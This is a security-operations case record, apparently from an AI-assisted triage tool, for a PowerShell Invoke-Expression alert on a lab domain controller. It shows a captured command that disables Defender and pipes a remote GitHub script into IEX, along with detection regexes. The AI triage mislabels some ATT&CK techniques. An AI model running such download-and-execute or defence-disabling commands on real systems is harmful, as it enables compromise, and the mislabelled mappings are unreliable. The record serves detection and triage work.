Case #513
service.WIN-PS_Invoke_Expression_Usage
Analyst Verdict Classification
SUSPICIOUS by analyst
AI Analysis
Detections (1)
00023-WIN-PS_Invoke_Expression_Usage
high
Rule: service.WIN-PS_Invoke_Expression_Usage
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 78% · Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
155828224
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8396, 'THIS_ATOM': 'd55d696523198bca24198fe369c2a848', 'THREADS': 3, 'TIMESTAMP': 1774364743439, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8396
PROCESS_ID:
7484
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs"}
{'type': 'external_url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1021.005 (Remote Services: VNC)'}
MITRE:
T1021.005
T1059.001
Analyst Declaration:
Raw Detection JSON
{
"author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
"cat": "00023-WIN-PS_Invoke_Expression_Usage",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 155828224,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4489216,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 8396,
"THIS_ATOM": "d55d696523198bca24198fe369c2a848",
"THREADS": 3,
"TIMESTAMP": 1774364743439,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 8396,
"PROCESS_ID": 7484,
"THREADS": 31,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
"event_time": 1774364744023,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2893,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "d55d696523198bca24198fe369c2a848",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "206ee127bfd4633f7821f3c569c2a84a"
}
},
"detect_id": "e0d2d709-3aa4-4497-9316-bd0369c2a84a",
"detect_mtd": {
"description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
"falsepositives": [
"Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
],
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
"https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
],
"tags": [
"attack.t1059.001"
]
},
"gen_time": 1774364746921,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
"namespace": "general",
"priority": 2,
"routing": {
"arch": 2,
"did": "",
"event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
"event_time": 1774364744023,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2893,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "d55d696523198bca24198fe369c2a848",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "206ee127bfd4633f7821f3c569c2a84a"
},
"rule_tags": [
"ext:soteria-rules-edr",
"attack.t1059.001"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "service.WIN-PS_Invoke_Expression_Usage",
"ts": 1774364747000
}
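Worked triage of this detection, added here as an example and not code from the rule, FusionSOC or LimaCharlie: it re-implements the detector description and false-positive note in the detect_mtd block above (Invoke-Expression in a PowerShell command line; NuGet, Chef or Puppet alongside it is normal), then applies the two overrides an analyst would want on this case, Defender tampering via Set-MpPreference and an IEX download cradle fetching a remote script. The sample events, the benign command line, the CORP\svc-build user and the verdict labels are constructed; the ATT&CK mapping beyond T1059.001 is this example's own choice.

```python
"""Triage logic for a WIN-PS_Invoke_Expression_Usage style hit.

Added example; not the detector's, FusionSOC's or LimaCharlie's own code.
It re-implements the detector description (IEX in a PowerShell command
line) and its false-positive note (NuGet/Chef/Puppet is normal), then adds
the two checks that override that note in this case: Defender tampering and
a download cradle pulling a remote script.
"""
import re

# Constructed NEW_PROCESS event, trimmed to the fields the logic reads.
# It mirrors the event in this case; it is sample data, not a live feed.
SAMPLE_EVENT = {
    "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "FILE_IS_SIGNED": 1,
    "USER_NAME": r"NT AUTHORITY\SYSTEM",
    "COMMAND_LINE": (
        "PowerShell.exe Set-ExecutionPolicy Unrestricted ; "
        "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; "
        "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; "
        "Set-MpPreference -DisableRealtimeMonitoring $true ; "
        "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/"
        "master/install-atomicredteam.ps1' -UseBasicParsing) ; "
        "Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005"
    ),
    "PARENT": {
        "FILE_PATH": r"C:\Windows\System32\cmd.exe",
        "COMMAND_LINE": r"cmd.exe /C C:\Windows\TEMP\pldB3A2.tmp.bat T1021.005 ",
    },
}

# Constructed benign event (hypothetical user): IEX used next to NuGet on a
# local file, which is the situation the rule's false-positive note describes.
BENIGN_EVENT = {
    "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "FILE_IS_SIGNED": 1,
    "USER_NAME": r"CORP\svc-build",
    "COMMAND_LINE": "powershell.exe Install-PackageProvider -Name NuGet -Force; "
                    "iex (Get-Content .\\bootstrap.ps1 -Raw)",
}

IEX_RE = re.compile(r"(?i)(?<![\w-])(?:iex|invoke-expression)(?![\w-])")
CRADLE_RE = re.compile(r"(?i)(?<![\w-])(?:iwr|invoke-webrequest|irm|invoke-restmethod|"
                       r"downloadstring|downloadfile|net\.webclient)(?![\w-])")
URL_RE = re.compile(r"(?i)https?://[^\s'\"()]+")
TECHNIQUE_RE = re.compile(r"\bT\d{4}(?:\.\d{3})?\b")
DEFENDER_OFF_RE = re.compile(r"(?i)set-mppreference\b[^;]*-disablerealtimemonitoring\s+\$true")
EXECPOLICY_RE = re.compile(r"(?i)set-executionpolicy\s+(?:-executionpolicy\s+)?(?:unrestricted|bypass)\b")
ADMIN_TOOLING_RE = re.compile(r"(?i)\b(?:nuget|chef|puppet)\b")


def analyse_command_line(cmdline):
    """Scan one command line and return the raw findings."""
    return {
        "iex": bool(IEX_RE.search(cmdline)),
        "download_cradle": bool(CRADLE_RE.search(cmdline)),
        "urls": URL_RE.findall(cmdline),
        "defender_disabled": bool(DEFENDER_OFF_RE.search(cmdline)),
        "execpolicy_weakened": bool(EXECPOLICY_RE.search(cmdline)),
        "admin_tooling": bool(ADMIN_TOOLING_RE.search(cmdline)),
        # ATT&CK IDs passed to Invoke-AtomicTest tell you which test was run.
        "simulated_techniques": sorted(set(TECHNIQUE_RE.findall(cmdline))),
    }


def map_mitre(findings):
    """ATT&CK mapping chosen for this example (the rule itself only tags T1059.001)."""
    ids = []
    if findings["iex"]:
        ids.append("T1059.001")  # Command and Scripting Interpreter: PowerShell
    if findings["download_cradle"] and findings["urls"]:
        ids.append("T1105")  # Ingress Tool Transfer
    if findings["defender_disabled"]:
        ids.append("T1562.001")  # Impair Defenses: Disable or Modify Tools
    return ids


def triage(event):
    """Apply the detector, its false-positive note, and the overrides."""
    f = analyse_command_line(event["COMMAND_LINE"])
    if not f["iex"]:
        verdict = "no_match"
    elif f["defender_disabled"] or (f["download_cradle"] and f["urls"]):
        # Turning off real-time monitoring or pulling a remote script through
        # IEX outweighs the NuGet/Chef/Puppet allowance in the rule's FP note.
        verdict = "escalate"
    elif f["admin_tooling"]:
        verdict = "likely_benign"
    else:
        verdict = "review"
    parent = event.get("PARENT", {})
    path = event["FILE_PATH"]
    return {
        "verdict": verdict,
        "mitre": map_mitre(f),
        "process_chain": f"{parent.get('FILE_PATH', '?')} -> {path}",
        "user": event.get("USER_NAME"),
        # A signed binary in System32 only rules out a masqueraded
        # powershell.exe; it says nothing about the arguments.
        "signed_system_binary": bool(event.get("FILE_IS_SIGNED"))
        and path.lower().startswith(r"c:\windows\system32"),
        **f,
    }


if __name__ == "__main__":
    for name, ev in (("case", SAMPLE_EVENT), ("benign", BENIGN_EVENT)):
        r = triage(ev)
        print(f"{name}: {r['verdict']} mitre={r['mitre']} chain={r['process_chain']}")
        print(f"  urls={r['urls']} simulated={r['simulated_techniques']}")
```

Run as a script it triages both events: the case event escalates on Set-MpPreference and the remote IWR fetch even though NuGet is present, while the NuGet-plus-local-file command line falls into the rule's false-positive allowance. The signed System32 path is reported separately so it is not mistaken for a benign signal about the arguments.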
Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
Triage JSON
{
"confidence": 0.775,
"false_positive_reason": null,
"investigation_questions": [
"What user account was used to execute this process?",
"Were there any prior attempts to access this host before this event?",
"Is this a legitimate security testing environment or an actual compromised host?"
],
"ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments reveal malicious intent: disabling antivirus monitoring, downloading code via IEX to an external URL, and executing offensive security testing scripts. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution chain.",
"iocs_extracted": [
{
"type": "command_line",
"value": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs"
},
{
"type": "external_url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1021.005 (Phishing)"
}
],
"mitre_techniques": [
"T1021.005",
"T1059.004"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Isolate the host from the network immediately to prevent lateral movement",
"Block outbound traffic to raw.githubusercontent.com at the firewall level",
"Review and disable any scheduled tasks or services that may have triggered this execution",
"Perform forensic imaging of the affected system for malware analysis"
],
"risk_score": 85,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell using IEX to download and execute code from an external GitHub repository. The command explicitly disables real-time monitoring and installs the Atomic Red Team framework for offensive security testing.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario. However, the command line arguments reveal malicious intent: disabling antivirus monitoring, downloading code via IEX to an external URL, and executing offensive security testing scripts. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate execution chain.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.6\nA PowerShell process running from the expected System32 location with a command line that includes actions to modify security settings, disable antivirus, and download scripts from GitHub, indicating potential malicious intent despite the legitimate binary path.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known Windows system binary and signed, making it likely benign in isolation. However, the COMMAND_LINE shows suspicious activities such as changing execution policy, setting security protocols, installing package providers, disabling real-time monitoring, and downloading/invoking scripts from external sources, which are common in attacks. The HASH is Microsoft-signed, supporting legitimacy, but the context suggests possible obfuscation or red teaming.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 60% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.6,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
Response Actions
| Action | Target | Status | Result |
|---|---|---|---|
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found |
| recommended | Isolate the host from the network immediately to prevent lateral movement | executed | Lateral Movement Investigation: 50 events found |
| recommended | Block outbound traffic to raw.githubusercontent.com at the firewall level | executed | User Activity Investigation: 31 events found |
| recommended | Review and disable any scheduled tasks or services that may have triggered this execution | executed | General Activity Sweep: 0 events found |
| recommended | Perform forensic imaging of the affected system for malware analysis | executed | General Activity Sweep: 0 events found |
Notes (6)
FusionSOC AI
2026-03-24T16:55
FusionSOC AI
2026-03-24T16:55
FusionSOC AI
2026-03-24T16:55
FusionSOC AI
2026-03-24T16:55
FusionSOC AI
2026-03-24T16:55
FusionSOC AI
2026-03-24T16:55
Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating → closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:55:08
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:55:08
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:55:08
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Perform forensic imaging of the affected system for malware analysis **Sensor:**...
2026-03-24T16:55:08
FusionSOC
Response action queued: recommended on Perform forensic imaging of the affected system for malware analysis
2026-03-24T16:55:08
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:55:08
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:55:08
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Review and disable any scheduled tasks or services that may have triggered this ...
2026-03-24T16:55:08
FusionSOC
Response action queued: recommended on Review and disable any scheduled tasks or services that may have triggered this execution
2026-03-24T16:55:08
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:55:08
FusionSOC
Action recommended → executed: User Activity Investigation: 31 events found
2026-03-24T16:55:08
FusionSOC AI
Note by FusionSOC AI: ## User Activity Investigation **Action:** Block outbound traffic to raw.githubusercontent.com at the firewall level *...
2026-03-24T16:55:07
FusionSOC
Response action queued: recommended on Block outbound traffic to raw.githubusercontent.com at the firewall level
2026-03-24T16:55:07
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:55:07
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:55:07
FusionSOC AI
Note by FusionSOC AI: ## Lateral Movement Investigation **Action:** Isolate the host from the network immediately to prevent lateral movemen...
2026-03-24T16:55:06
FusionSOC
Response action queued: recommended on Isolate the host from the network immediately to prevent lateral movement
2026-03-24T16:55:06
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:55:06
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:55:06
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:55:06
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T16:55:06
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:55:05
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:55:05
FusionSOC AI
Detection e0d2d709-3aa4-4497-9316-bd0369c2a84a triaged as suspicious (high severity, confidence: 78%)
2026-03-24T16:55:05
FusionSOC AI
Case created from detection: service.WIN-PS_Invoke_Expression_Usage